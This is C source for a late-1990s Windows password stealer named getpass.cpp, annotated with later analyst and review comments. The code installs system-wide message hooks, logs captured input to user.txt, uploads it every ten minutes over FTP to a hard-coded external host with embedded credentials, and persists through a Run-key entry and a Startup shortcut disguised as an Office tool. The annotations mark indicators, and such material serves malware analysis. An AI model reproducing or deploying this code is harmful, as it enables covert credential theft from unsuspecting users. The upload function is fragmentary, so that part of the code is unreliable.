

/* getpass.cpp:
   Records everything typed into password boxes in IE and all other applications, and sends it by FTP to a personal home page
   http://www.nease.net/~inetsoft, http://netcom.163.net netcom@163.net paladin@188.net inetsoft@china.com
   by lgd/Paladin.InetSoft GuangZhou
   Update 19981215: initconn(), using sd_connect instead of gethostname
   Update  19981218: add CreateStartup() and GetProxy()
*/

#include 
#include 
#include 
#include 
#include 
#include 

#include "resource.h"
#include "tcp.h"

/* Persistence / configuration helpers defined later in this file. */
int CreateRun(void);
int CreateStartup(void); /* copy the files to the Windows directory and create a Startup shortcut or set up auto-start */
int DeleteShortCut();
int GetProxy(void);      /* look up the proxy server */
int SendUserData(int pos); /* send data to the FTP server */

/* Minimal FTP client used for the upload. */
int ftp_cmd(int sd, char *cmd, int success_code); /* execute a command */
int ftp_login(char *hostname, char *user_name, char *passwd);
int ftp_put_file(int sd, char *file_local, int pos, char *file_remote, int max_wait_time);
int initconn(int sd);  /* set up the data connection */
int get_reply(int sd); /* receive the reply */
void ftp_quit(int sd);

int g_code;          /* last FTP reply code stored by get_reply() */
char g_reply[1024];  /* last FTP reply line; filled byte-by-byte by get_reply() */
char proxy[20];      /* proxy host name copied in by GetProxy(); empty when none was found */

/* hooks in ../spydll/hook.c */
/*
 * Install (fSet != 0) or remove (fSet == 0) the two message hooks.
 *
 * On install the function loads "fivedll.dll" and registers its exports
 * "SpyGetMsgProc" (WH_GETMESSAGE) and "SpyCallWndProc" (WH_CALLWNDPROC) with
 * a thread id of 0, i.e. for every thread on the current desktop rather than
 * one thread of this process. The hook procedures themselves live in the DLL
 * (../spydll/hook.c) and are not part of this listing.
 *
 * Returns TRUE on success, FALSE when the DLL cannot be loaded or a hook
 * cannot be installed.
 *
 * Analyst note: the observable indicators in this block are the DLL name and
 * the two export names; a desktop-wide WH_GETMESSAGE / WH_CALLWNDPROC pair
 * set from a windowless background process is the behaviour to look for.
 */
BOOL SetMsgHook(BOOL fSet)
{
    /* Handles are static so a later call with fSet == FALSE can undo the install. */
    static HHOOK hhkGetMessage = NULL;
    static HHOOK hhkCallWndProc = NULL;
    static HMODULE hmodHook;

    if (fSet)
    {
        /* Load the hook DLL once; it is resolved by name through the normal DLL search order. */
        if (!hmodHook)
        {
            if (!(hmodHook = LoadLibrary("fivedll.dll")))
            {
                return FALSE;
            }
        }

        /* Hook 1: messages retrieved from message queues. */
        if (!hhkGetMessage)
        {
            if (!(hhkGetMessage = SetWindowsHookEx(WH_GETMESSAGE,
                (HOOKPROC)GetProcAddress(hmodHook, "SpyGetMsgProc"), hmodHook, 0)))
            {
                return FALSE;
            }
        }

        /* Hook 2: messages sent directly to window procedures. */
        if (!hhkCallWndProc)
        {
            if (!(hhkCallWndProc = SetWindowsHookEx(WH_CALLWNDPROC,
                (HOOKPROC)GetProcAddress(hmodHook, "SpyCallWndProc"), hmodHook, 0)))
            {
                /* Second hook failed: roll back the first one before reporting failure. */
                UnhookWindowsHookEx(hhkGetMessage);
                return FALSE;
            }
        }
    }
    else
    {
        if (hhkGetMessage)
        {
            UnhookWindowsHookEx(hhkGetMessage);
            hhkGetMessage = NULL;
        }

        if (hhkCallWndProc)
        {
            UnhookWindowsHookEx(hhkCallWndProc);
            hhkCallWndProc = NULL;
        }
		FreeLibrary(hmodHook);
    }

    return TRUE;
}

/* File-scope offset; MainWndProc declares its own static filePos that shadows this one. */
int filePos =0;
/* Full path of the log file that gets uploaded; built in MainWndProc on WM_CREATE. */
char UserFile[128];
/*
 * Window procedure of the background window; it drives the whole program.
 *
 *  WM_CREATE           restore the upload offset, build the log-file path,
 *                      install the hooks and start a 10-minute timer.
 *  WM_TIMER            upload the part of the log file past the saved offset
 *                      and persist the new offset.
 *  WM_DESTROY /        remove the hooks, re-create the auto-start entry and
 *  WM_QUERYENDSESSION  shut the TCP layer down.
 *
 * Analyst note: artefacts visible here are the file "user.txt" in the system
 * directory and the profile entry [UserFile] Pos=<offset>. The log file is
 * presumably written by the hook DLL; that code is not in this listing.
 */
HRESULT CALLBACK MainWndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
	/* Byte offset of the data already uploaded; shadows the file-scope filePos. */
	static int filePos =0;
	int newPos =0;
	char temp[80];

	switch(msg)
	{
	case WM_CREATE:
		/* The offset survives restarts through the profile entry [UserFile] Pos. */
		if((filePos =GetProfileInt("UserFile", "Pos", -1)) ==-1)
		{
			WriteProfileString("UserFile", "Pos", "0");
			filePos =0;
		}
		/* Leave 20 bytes of headroom for the file name appended below. */
		if(!GetSystemDirectory(UserFile, sizeof(UserFile)-20))
			return TRUE;
		strcat(UserFile, "\\user.txt");

		SetMsgHook(TRUE);
		SetTimer(hWnd, 1, 600000, NULL);/* send the file every 10 minutes */
		break;
	case WM_TIMER:
		/* Stop the timer while the upload runs so uploads cannot overlap. */
		KillTimer(hWnd, 1); 
		newPos =SendUserData(filePos);
		/* Only advance (and persist) the offset when something was actually sent. */
		if(newPos >filePos)
		{
			filePos =newPos;
			WriteProfileString("UserFile", "Pos", itoa(filePos, temp, 10));
		}
		SetTimer(hWnd, 1, 600000, NULL);
		break;
	case WM_DESTROY:
		SetMsgHook(FALSE);
		/* The auto-start entry is re-created on every exit path. */
		CreateStartup();
		tcp_exit();
		PostQuitMessage(0);
		break;
	case WM_QUERYENDSESSION:
		/* Same clean-up at logoff/shutdown; TRUE lets the session end. */
		SetMsgHook(FALSE);
		CreateStartup();
		tcp_exit();
		return TRUE;
	}
	return DefWindowProc(hWnd, msg, wParam, lParam);
}

/*
 * Program entry point.
 *
 * Exits immediately if a window of class "Five100" already exists (single
 * instance check), then reads the proxy setting, sets up auto-start, removes
 * the Startup shortcut, initialises the TCP layer, registers the "Five100"
 * window class and creates one window of it. The window is created without
 * WS_VISIBLE and no ShowWindow call appears in this function, so it only
 * serves as a message target for MainWndProc.
 *
 * Analyst note: the window class name "Five100" with an empty title is a
 * stable indicator of a running instance.
 */
int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    HWND hwnd;
	WNDCLASS ws;
	MSG msg;
	
	/* Another instance is already running: do nothing. */
	if(FindWindow("Five100", NULL) !=NULL) return 0;

	memset(proxy, 0, sizeof(proxy));
	memset(&ws, 0, sizeof(ws));
	
	GetProxy();
	CreateStartup();
	DeleteShortCut();
	tcp_init();

	ws.lpszClassName ="Five100";
	ws.lpfnWndProc =MainWndProc;
	ws.hbrBackground =(HBRUSH)(COLOR_WINDOW+1);
	ws.hInstance =hInstance;
	ws.hIcon =LoadIcon(hInstance, MAKEINTRESOURCE(IDI_ICON1));

	/* NOTE(review): RegisterClass returns an ATOM, 0 on failure, so this <0 test looks like it can never fire. */
	if(RegisterClass(&ws) <0)
	{
		tcp_exit();
		return FALSE;
	}
	hwnd =CreateWindow("Five100", "", WS_POPUP|WS_SYSMENU|WS_CAPTION,
		20, 20, 200, 200, NULL, NULL, hInstance, NULL);
	if(hwnd ==NULL)
	{
		tcp_exit();
		return FALSE;
	}
	/* Standard message pump; WM_CREATE / WM_TIMER handling happens in MainWndProc. */
	while (GetMessage(&msg, NULL, 0, 0))
    {                           
      {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
      }  
    }
	/* Same clean-up as the WM_DESTROY handler. */
	SetMsgHook(FALSE);
	CreateStartup();
	tcp_exit();

    return msg.wParam;
}

/*
 * Upload the part of UserFile that starts at byte offset `pos` over FTP.
 *
 * The remote file name is "pass.<n>" with n taken from rand() % 10000. When
 * a proxy host was found by GetProxy() the connection goes to that host with
 * the user name in user@host form; otherwise it goes directly to the
 * hard-coded host. The login is tried at most twice.
 *
 * Returns the new offset (pos + bytes reported by ftp_put_file) or -1 on
 * any failure.
 *
 * Analyst note: host name, account name and password are embedded as string
 * literals, and the session is plain FTP, so all of them are recoverable
 * from the binary and from a packet capture.
 */
int SendUserData(int pos)
{
	int sd =-1, len =0;
	char hostname[20], username[50], file_remote[128];
	int retry_times =0;

	len =rand()%10000;
	if(len <0) len =-len;
	sprintf(file_remote, "pass.%d", len);
	/* www.nease.net:202.96.152.194; using SMTP would avoid exposing the password, but sometimes it cannot get through a proxy server */
	if(proxy[0])
	{
		/* proxy[] and hostname[] are both 20 bytes, so this copy fits as long as proxy is NUL-terminated. */
		strcpy(hostname, proxy);
		strcpy(username, "paladin@paladin.163.net");
	}
	else
	{
retry_local:
		/* Also the retry target: a failed login through the proxy falls back to a direct connection. */
		strcpy(hostname, "paladin.163.net");
		strcpy(username, "paladin");
	}
	if((sd =ftp_login(hostname, username, "c.30mn0")) <0)
	{
		if(++retry_times <2) goto retry_local;
		retry_times =0;
		return -1;
	}
	/* sd_connect is not declared in this file (presumably in tcp.h); initconn() reads it. */
	sd_connect =sd;
	if((len =ftp_put_file(sd, UserFile, pos, file_remote, 200)) <0)
	{
		ftp_quit(sd);
		return -1;
	}
	ftp_quit(sd);
	return pos+len;
}

/*
 * Send one FTP command on control socket `sd` and check the reply code.
 *
 * cmd           complete command line including the trailing "\r\n"
 * success_code  reply code that counts as success
 *
 * Returns 0 on success, -1 when the command could not be sent in full,
 * -2 when the server answered with a different code.
 */
int ftp_cmd(int sd, char *cmd, int success_code)
{
  int code;

  /* 5 is passed to tcp_send as its last argument (presumably a timeout in seconds; tcp.h is not shown). */
  if(tcp_send(sd, cmd, strlen(cmd), 5) !=(int)strlen(cmd))
    return -1;
  if((code =get_reply(sd)) !=success_code)
  {
    return -2;
  }
  return 0;
}

/*
 * Open an FTP control connection to `hostname` on port 21 and log in.
 *
 * Expects the usual reply sequence: 220 greeting, 331 after USER, 230 after
 * PASS. The socket is closed on every failure path.
 *
 * Returns the connected control socket, or -1 on failure.
 *
 * Analyst note: user name and password travel in clear text in the USER and
 * PASS commands.
 */
int ftp_login(char *hostname, char *user_name, char *passwd)
{
  int sd, ret;
  /* NOTE(review): the sprintf calls below do not bound the argument length against this 100-byte buffer. */
  char cmds[100];
  
  if((sd =tcp_connect(hostname, 21, 10)) <0)
    return -1;
  /* Server greeting. */
  if((ret =get_reply(sd)) !=220)
  {
    closesocket(sd);
    return -1;
  }
  sprintf(cmds, "USER %s\r\n", user_name);
  if(ftp_cmd(sd, cmds, 331) <0)
  {
    closesocket(sd);
    return -1;
  }
  sprintf(cmds, "PASS %s\r\n", passwd);
  if(ftp_cmd(sd, cmds, 230) <0)
  {
    closesocket(sd);
    return -1;
  }

  return sd;
}

/*
 * Upload the tail of `file_local`, starting at byte offset `pos`, as
 * `file_remote` on the server behind control socket `sd`.
 *
 * NOTE(review): this listing is incomplete. The text between the first
 * file_len check and the clean-up code appears to have been lost when the
 * page was extracted: the `f_exit` label targeted by the goto is missing,
 * sd_accept and sd_bind are used without a visible declaration, and the
 * locals cmds, len, len_sent, code and buf are never used in what remains.
 * The line `if(file_len =0) closesocket(sd_accept);` is most likely two
 * separate statements fused together. Treat the body below as a fragment,
 * not as the function's real logic.
 */
int ftp_put_file(int sd, char *file_local, int pos, char *file_remote, int max_wait_time)
{
  char cmds[300];
  int len, file_len =0, len_sent =0, ret =0, code;
  char *buf =NULL;
  FILE *fp =NULL;
  
  if((fp =fopen(file_local, "r")) ==NULL)
  {
    ret =-1;
    goto f_exit;
  }
  /* Size of the not-yet-uploaded tail: total file length minus the saved offset. */
  fseek(fp, 0, SEEK_END);
  file_len =ftell(fp)-pos;
  if(file_len <0)
  {
	  fclose(fp);
	  return -1;
  }
  /* --- extraction gap: the transfer code that belongs here is not in the listing --- */
  if(file_len =0) closesocket(sd_accept);
  if(sd_bind >=0) closesocket(sd_bind);
  sd_accept =-1;
  sd_bind =-1;
  if(fp) fclose(fp);
  if(buf) free(buf);

  return ret;
}

/*
 * Prepare an active-mode FTP data connection.
 *
 * Binds a local socket through tcp_bind(), reads the local IP address from
 * the control connection (sd_connect) and the local port from the new
 * socket, and announces both to the server with a PORT command on `sd`.
 *
 * Returns the bound data socket when the server answers 200, otherwise -1.
 *
 * Analyst note: active mode means the server connects back to the client
 * for the data transfer, so the inbound connection attempt is visible to a
 * host or perimeter firewall.
 */
int initconn(int sd)
{
  char *p1, *p2;
  struct sockaddr_in addr1, addr2;
  char temp[256];
  int len;
  int code, sd_data;
  /*struct hostent *hp;*/
  
  if((sd_data =tcp_bind(NULL, 0)) <0)
    return -1;
  len =sizeof(addr1);
  /*if(gethostname(temp, sizeof(temp)) !=0)
    return -1;
  if((hp =gethostbyname(temp)) ==NULL)
    return -1;*/
  /* Local address as seen on the control connection (replaces the gethostname lookup, per the file header). */
  if(getsockname(sd_connect, (struct sockaddr *)&addr1, &len) <0)
    return -1;
  if(getsockname(sd_data, (struct sockaddr *)&addr2, &len) <0)
    return -1;
  /*p1 =(char *)hp->h_addr;*/
  /* Both fields are read byte-wise in their stored order to form the six PORT arguments. */
  p1 =(char *)&addr1.sin_addr;
  p2 =(char *)&addr2.sin_port;
  sprintf(temp, "PORT %d,%d,%d,%d,%d,%d\r\n", ((int)p1[0]) &0xff, ((int)p1[1]) &0xff, (int)p1[2] &0xff, (int)p1[3]&0xff, (int)p2[0]&0xff, (int)p2[1]&0xff);
  if(tcp_send(sd, temp, strlen(temp), 10) !=(int)strlen(temp))
  {
    closesocket(sd_data);
    return -1;
  }
  if((code =get_reply(sd)) !=200)
  {
    closesocket(sd_data);
    return -1;
  }
  return sd_data;
}

/*
 * Read one FTP reply from control socket `sd` into g_reply and return its
 * numeric code (also stored in g_code).
 *
 * The reply is read one byte at a time until '\n'; CR and LF are replaced by
 * spaces. A '-' in the fourth column marks a continuation line, in which
 * case the next line is read into the same buffer. Returns -1 when a
 * completed line does not start with a number, and 0 (the initial value of
 * code) when the receive fails before a line is complete.
 *
 * NOTE(review): the index i is never checked against sizeof(g_reply), so a
 * reply line longer than the 1024-byte buffer is written past its end. The
 * input comes from the remote server, i.e. it is untrusted.
 */
int get_reply(int sd)
{
  int i, code =0;

again:
  i =0;
  memset(g_reply, 0, sizeof(g_reply));
  while(1)
  {
    if(tcp_recv(sd, &g_reply[i], 1, 10) !=1)
      break;
    if(g_reply[i] =='\r') g_reply[i] =' ';
    if(g_reply[i] =='\n')
    {
      g_reply[i] =' ';
      g_reply[i+1] =0;
	  if(sscanf(g_reply, "%d", &code) !=1)
      {
        return -1;
      }
      else break;
    }
    i++;
  }
  /* "NNN-" means more lines follow; keep reading until a line without the dash. */
  if(g_reply[3] =='-')
  {
	  i =0;
	  goto again;
  }
  g_code =code;
 
  return code;
}

/* End the FTP session: send QUIT (221 expected, result ignored) and close the control socket. */
void ftp_quit(int sd)
{
  ftp_cmd(sd, "QUIT\r\n", 221);
  closesocket(sd);
}

/*
 * Read the current user's Internet Settings "ProxyServer" value and store
 * the part before the first ':' in the global proxy[] buffer.
 *
 * Returns 0 when the value could be read, -1 when the key or the value is
 * missing.
 *
 * NOTE(review): the registry value may be up to 100 bytes, while proxy[] is
 * 20 bytes and the copy is an unbounded strcpy; a long proxy setting would
 * overflow the global buffer.
 */
int GetProxy(void)
{
	char *tok =NULL;
	HKEY hKey;
	unsigned char temp[100];
	unsigned long type, len;

	temp[0] =0;
	if(RegOpenKeyEx(HKEY_CURRENT_USER,
		"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
		0, KEY_READ, &hKey) !=ERROR_SUCCESS)
		return -1;
	len =sizeof(temp);
	if(RegQueryValueEx(hKey, "ProxyServer", NULL, &type, temp, &len) !=ERROR_SUCCESS)
	{
		RegCloseKey(hKey);
		return -1;
	}
	/* Keep only the host part of "host:port". */
	if(tok =strtok((char *)temp, ":"))
		strcpy(proxy, tok);
	RegCloseKey(hKey);
	return 0;
}

/*
 * Register the program for automatic start at logon by writing the value
 * "Five32" = "Five32.exe" under the machine-wide Run key.
 *
 * Returns 0 on success, -1 when the key cannot be opened for writing or the
 * value cannot be set.
 *
 * Analyst note: the value name and data are fixed strings, so this Run-key
 * entry is a direct persistence indicator. The data is a bare file name;
 * CreateStartup() copies the executable into the Windows directory.
 */
int CreateRun(void)
{
	HKEY hKey;
	const char *pval ="Five32.exe";
	
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
		"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
		0, KEY_WRITE, &hKey) !=ERROR_SUCCESS)
		return -1;
	/* Length includes the terminating NUL, as REG_SZ expects. */
	if(RegSetValueEx(hKey, "Five32", 0, REG_SZ, (const unsigned char *)pval,  strlen(pval)+1)
		!=ERROR_SUCCESS)
	{
		RegCloseKey(hKey);
		return -1;
	}
	RegCloseKey(hKey);
	return 0;
}

/* Create shortcut in startup menu */
/*
 * Install the program's files and make it start automatically.
 *
 * 1. Copies "fivedll.dll" and "five32.exe" from the current directory into
 *    the Windows directory (existing files are not overwritten because the
 *    third CopyFile argument is 1).
 * 2. Tries the Run-key method via CreateRun(); returns 0 if that worked.
 * 3. Otherwise creates a shell link to <windir>\five32.exe with description
 *    "five32" and saves it under <windir>\Start Menu\Programs\<folder> with
 *    a fixed .lnk name. The folder and link names are Chinese-language
 *    string literals in the code below.
 *
 * Returns 0 on the Run-key path, otherwise the last HRESULT cast to int.
 *
 * Analyst note: both dropped file names, the Run value and the shortcut path
 * are fixed strings and serve as host indicators.
 */
int CreateStartup(void)
{
	HRESULT hres; 
	IShellLink* pShellLink; 
	char temp[128], windir[100];

	GetWindowsDirectory(windir, sizeof(windir));
	sprintf(temp, "%s\\fivedll.dll", windir);
	CopyFile("fivedll.dll", temp, 1);
	sprintf(temp, "%s\\five32.exe", windir);
	CopyFile("five32.exe", temp, 1);

	/* Preferred persistence: Run key. The shortcut below is only the fallback. */
	if(CreateRun() ==0) return 0;
	CoInitialize(NULL);
	hres = CoCreateInstance(CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, 
                           IID_IShellLink, (LPVOID*)&pShellLink); 
	if(SUCCEEDED(hres)) 
	{ 
		IPersistFile* pPersistFile;
		sprintf(temp, "%s\\five32.exe", windir);
		pShellLink->SetPath(temp); 
		pShellLink->SetDescription("five32"); 
		hres =pShellLink->QueryInterface(IID_IPersistFile, (LPVOID*)&pPersistFile); 

		if(SUCCEEDED(hres)) 
		{ 
			WCHAR wsz[128]; 
			/* IPersistFile::Save takes a wide string, hence the ANSI-to-wide conversion. */
			sprintf(temp, "%s\\Start Menu\\Programs\\启动\\Office工具.lnk", windir);
			MultiByteToWideChar( CP_ACP, 0, temp,
				-1, wsz, 128); 
			hres = pPersistFile->Save(wsz, TRUE); 
			/*if(FAILED(hres)) 
			{
				char *pstr ="c:\\windows\\Start Menu\\Programs\\启动\\startrun.lnk";
				retry =1;
				copy spy.exe and spydll.dll to start
				goto retry;
			}*/
			pPersistFile->Release(); 
		} 
		pShellLink->Release(); 
	} 
	CoUninitialize();
	return (int)hres; 
}

/*
 * Delete the Startup-folder shortcut that CreateStartup() may have created.
 * The result of remove() is ignored; the function always returns 0.
 *
 * WinMain calls this right after CreateStartup(), so the shortcut only
 * exists between an exit-time CreateStartup() fallback and the next start
 * of the program.
 */
int DeleteShortCut()
{
	char windir[100], file[128];

	GetWindowsDirectory(windir, sizeof(windir));
	sprintf(file, "%s\\Start Menu\\Programs\\启动\\Office工具.lnk", windir);
	remove(file);
	return 0;
}